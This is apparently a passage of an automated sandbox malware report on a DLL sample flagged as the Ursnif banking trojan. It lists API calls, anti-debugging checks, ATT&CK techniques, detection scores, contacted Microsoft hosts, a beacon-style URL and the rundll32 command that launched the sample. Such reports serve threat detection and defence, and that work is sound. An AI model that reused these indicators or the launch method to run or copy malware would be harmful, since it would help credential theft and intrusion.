Source:	Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000000E.00000003.877259368.00000000054C3000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 0000000E.00000003.877231767.00000000054B0000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000E.00000003.877150274.00000000053A1000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: c:\Tube-meet\585\straight\lift\38_Claim\Tail.pdb source: loaddll32.exe, 00000000.00000002.910074848.000000006D4C9000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.911410296.000000006D4C9000.00000002.00020000.sdmp, nT5pUwoJSS.dll
Source:	Binary string: shcore.pdbk source: WerFault.exe, 0000000E.00000003.877239660.00000000054B5000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000E.00000003.877150274.00000000053A1000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 0000000E.00000003.877239660.00000000054B5000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb4a source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000E.00000003.877239660.00000000054B5000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 0000000E.00000003.877169719.00000000054B2000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: TextInputFramework.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 0000000E.00000003.877150274.00000000053A1000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000E.00000003.877231767.00000000054B0000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000E.00000003.877239660.00000000054B5000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000E.00000003.877231767.00000000054B0000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000E.00000003.877231767.00000000054B0000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 0000000E.00000003.877150274.00000000053A1000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000000E.00000003.877150274.00000000053A1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000E.00000003.877150274.00000000053A1000.00000004.00000001.sdmp
Source:	Binary string: mpr.pdb7` source: WerFault.exe, 0000000E.00000003.877231767.00000000054B0000.00000004.00000040.sdmp

Source: nT5pUwoJSS.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: nT5pUwoJSS.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: nT5pUwoJSS.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: nT5pUwoJSS.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: nT5pUwoJSS.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D4817FA LoadLibraryA,GetProcAddress,

0_2_6D4817FA

Source: nT5pUwoJSS.dll

Static PE information: real checksum: 0x84de2 should be: 0x84de4

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D482173 push ecx; ret	0_2_6D482183
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D482120 push ecx; ret	0_2_6D482129
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D492C15 push ebp; retf	0_2_6D492C16
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D494348 push ss; ret	0_2_6D49434B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4C2761 push ecx; ret	0_2_6D4C2774
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D49778D pushfd ; ret	0_2_6D4977AB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D492F9A push edi; retf	0_2_6D492FA4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D482173 push ecx; ret	3_2_6D482183
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D482120 push ecx; ret	3_2_6D482129
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02C8B0BB push ecx; ret	3_2_02C8B0CB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02C8AD00 push ecx; ret	3_2_02C8AD09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D492C15 push ebp; retf	3_2_6D492C16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D494348 push ss; ret	3_2_6D49434B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4C2761 push ecx; ret	3_2_6D4C2774
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D49778D pushfd ; ret	3_2_6D4977AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D492F9A push edi; retf	3_2_6D492FA4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_06B3F7B4 push 776EF672h; iretd	4_2_06B3F7E5

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.881584954.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881638380.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881444184.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881614039.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881537844.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881689753.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881502007.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881360850.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6960, type: MEMORY

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

3_2_02C84C3B

Source: WerFault.exe, 0000000E.00000002.892437315.0000000005110000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 0000000E.00000003.889249389.0000000005046000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: WerFault.exe, 0000000E.00000002.892437315.0000000005110000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 0000000E.00000002.892437315.0000000005110000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WerFault.exe, 0000000E.00000002.892437315.0000000005110000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D4C150C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_6D4C150C

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D4817FA LoadLibraryA,GetProcAddress,

0_2_6D4817FA

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4F5770 mov eax, dword ptr fs:[00000030h]	0_2_6D4F5770
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4F56A6 mov eax, dword ptr fs:[00000030h]	0_2_6D4F56A6
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4F52AD push dword ptr fs:[00000030h]	0_2_6D4F52AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4F5770 mov eax, dword ptr fs:[00000030h]	3_2_6D4F5770
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4F56A6 mov eax, dword ptr fs:[00000030h]	3_2_6D4F56A6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4F52AD push dword ptr fs:[00000030h]	3_2_6D4F52AD

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4C150C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6D4C150C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4C636F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6D4C636F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4C2F08 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6D4C2F08
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4C150C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6D4C150C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4C636F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6D4C636F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4C2F08 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6D4C2F08

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\nT5pUwoJSS.dll',#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.909717516.0000000001870000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.910277829.0000000003140000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.909717516.0000000001870000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.910277829.0000000003140000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.909717516.0000000001870000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.910277829.0000000003140000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.909717516.0000000001870000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.910277829.0000000003140000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_02C82D6E cpuid

3_2_02C82D6E

Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoA,		0_2_6D4C7660
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,		3_2_6D4C7660

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D481237 SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

0_2_6D481237

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_02C82D6E RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

3_2_02C82D6E

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D481CDD CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_6D481CDD

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.881584954.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881638380.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881444184.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881614039.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881537844.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881689753.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881502007.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881360850.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6960, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.881584954.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881638380.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881444184.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881614039.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881537844.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881689753.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881502007.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881360850.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6960, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Path Interception	Process Injection12	Masquerading1	Input Capture1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Security Software Discovery11	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Account Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	System Owner/User Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery23	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
nT5pUwoJSS.dll	21%	ReversingLabs	Win32.Trojan.Zusy
nT5pUwoJSS.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
3.2.rundll32.exe.2c80000.1.unpack	100%	Avira	HEUR/AGEN.1108168		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://crl.microsoft	0%	URL Reputation	safe
http://crl.microsoft	0%	URL Reputation	safe
http://crl.microsoft	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
outlook.com	40.97.153.146	true	false	high
HHN-efz.ms-acdc.office.com	52.97.233.66	true	false	high
www.outlook.com	unknown	unknown	false	high
outlook.office365.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://outlook.com/login/greed/KnH9H6Qjc_2F7/0e3_2F0_/2FRqQPyOKs18rFK5waVCGCI/jIBCBbgDdF/18TiURZdioL3eU4Wc/SUXArexakZ5d/R0lDxIGeIYj/c6FwtLcTr3EmEj/nbrTM1t_2BdTxREGmfFhs/_2BnTf5cT9dEAnPd/AFLbs3lARk22SMJ/POUz7dti2oyFXHE3_2/FgEVGs1vD/4LhoHpnAxyp/chUrsX.gfk	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://outlook.office365.com/login/greed/KnH9H6Qjc_2F7/0e3_2F0_/2FRqQPyOKs18rFK5waVCGCI/jIBCBbgDdF/	{4BD5DCDF-B312-11EB-90EB-ECF4BBEA1588}.dat.17.dr	false		high
http://crl.microsoft	WerFault.exe, 0000000E.00000003.889153103.0000000005072000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
52.97.233.66	HHN-efz.ms-acdc.office.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
40.101.137.82	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
40.97.153.146	outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	412166
Start date:	12.05.2021
Start time:	13:05:21
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	nT5pUwoJSS.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.troj.winDLL@15/9@3/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 11.1% (good quality ratio 10.5%) Quality average: 79.6% Quality standard deviation: 28.6%
HCA Information:	Successful, ratio: 83% Number of executed functions: 52 Number of non-executed functions: 58
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, ielowutil.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe Excluded IPs from analysis (whitelisted): 52.255.188.83, 40.88.32.150, 92.122.145.220, 2.20.143.16, 2.20.142.209, 104.42.151.234, 52.147.198.201, 168.61.161.212, 20.190.159.138, 20.190.159.132, 20.190.159.136, 40.126.31.141, 40.126.31.137, 20.190.159.134, 40.126.31.139, 40.126.31.143, 20.82.209.183, 104.43.193.48, 92.122.213.247, 92.122.213.194, 88.221.62.148 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, e11290.dspg.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, go.microsoft.com, login.live.com, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, skypedataprdcolcus17.cloudapp.net, a767.dscg3.akamai.net, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus17.cloudapp.net, dub2.current.a.prd.aadg.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus16.cloudapp.net, www.tm.lg.prod.aadmsa.trafficmanager.net Report size getting too big, too many NtOpenKeyEx calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/412166/sample/nT5pUwoJSS.dll

Simulations

Behavior and APIs

Time	Type	Description
13:07:40	API Interceptor	1x Sleep call for process: rundll32.exe modified
13:08:01	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
40.97.153.146	5instructio.exe	Get hash	malicious	Browse
	.exe	Get hash	malicious	Browse
	61Documen.exe	Get hash	malicious	Browse
	65document.exe	Get hash	malicious	Browse
	29mail98@vip.son.exe	Get hash	malicious	Browse
	57document.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HHN-efz.ms-acdc.office.com	kZcCqvNtWa.dll	Get hash	malicious	Browse	52.98.171.226
	A5uTdwOwJ1.dll	Get hash	malicious	Browse	40.101.138.210
	FuiZSHt8Hx.dll	Get hash	malicious	Browse	52.98.151.242
	609a460e94791.tiff.dll	Get hash	malicious	Browse	52.97.201.34
	iJdlvBxhYu.dll	Get hash	malicious	Browse	52.97.150.2
	8OKQ6ogGRx.dll	Get hash	malicious	Browse	40.101.138.2
	609110f2d14a6.dll	Get hash	malicious	Browse	40.101.137.34
	New%20order%20contract.html	Get hash	malicious	Browse	52.98.175.2
outlook.com	A1qhcbngFV.exe	Get hash	malicious	Browse	104.47.54.36
	file.msg.exe	Get hash	malicious	Browse	104.47.56.138
	Update-KB1484-x86.exe	Get hash	malicious	Browse	104.47.57.138
	n6osajjc938.exe	Get hash	malicious	Browse	104.47.54.36
	9b3d7f02.exe	Get hash	malicious	Browse	104.47.54.36
	5zc9vbGBo3.exe	Get hash	malicious	Browse	52.101.24.0
	InnAcjnAmG.exe	Get hash	malicious	Browse	104.47.53.36
	8X93Tzvd7V.exe	Get hash	malicious	Browse	52.101.24.0
	u8A8Qy5S7O.exe	Get hash	malicious	Browse	104.47.53.36
	SecuriteInfo.com.Mal.GandCrypt-A.24654.exe	Get hash	malicious	Browse	104.47.54.36
	SecuriteInfo.com.Mal.GandCrypt-A.5674.exe	Get hash	malicious	Browse	104.47.54.36
	SecuriteInfo.com.W32.AIDetect.malware2.29567.exe	Get hash	malicious	Browse	104.47.53.36

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
